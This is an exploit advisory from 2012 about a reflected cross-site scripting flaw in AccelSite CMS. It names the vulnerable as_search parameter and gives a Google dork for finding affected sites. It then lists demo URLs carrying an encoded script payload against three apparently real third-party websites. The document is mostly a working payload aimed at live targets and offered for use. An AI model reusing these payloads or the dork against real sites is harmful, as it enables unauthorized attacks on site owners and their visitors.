# Exploit Title: AccelSite CMS Cross Site Scripting Vulnerability # # Google Dork: Intext:"Powered by AccelSite CMS" # # Date: 08/30/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # download Link Or Vendor Home: http://netacceleration.com/as_cms # # Tested on: all # ================================== as_search parametr in index.php is Vulnerable to xss exploit : index.php?contentID=[id]&as_search=[htmlcode]&submit=GO&searchAll= D3M0 : http://makeandtakeatoz.com/index.php?contentID=1304&as_search=%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E&submit=GO&searchAll= http://golfingatoz.com/index.php?contentID=404&as_search=%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E&submit=GO&searchAll= http://chicagolandatoz.com/index.php?contentID=134&as_search=%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E&submit=GO&searchAll= ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369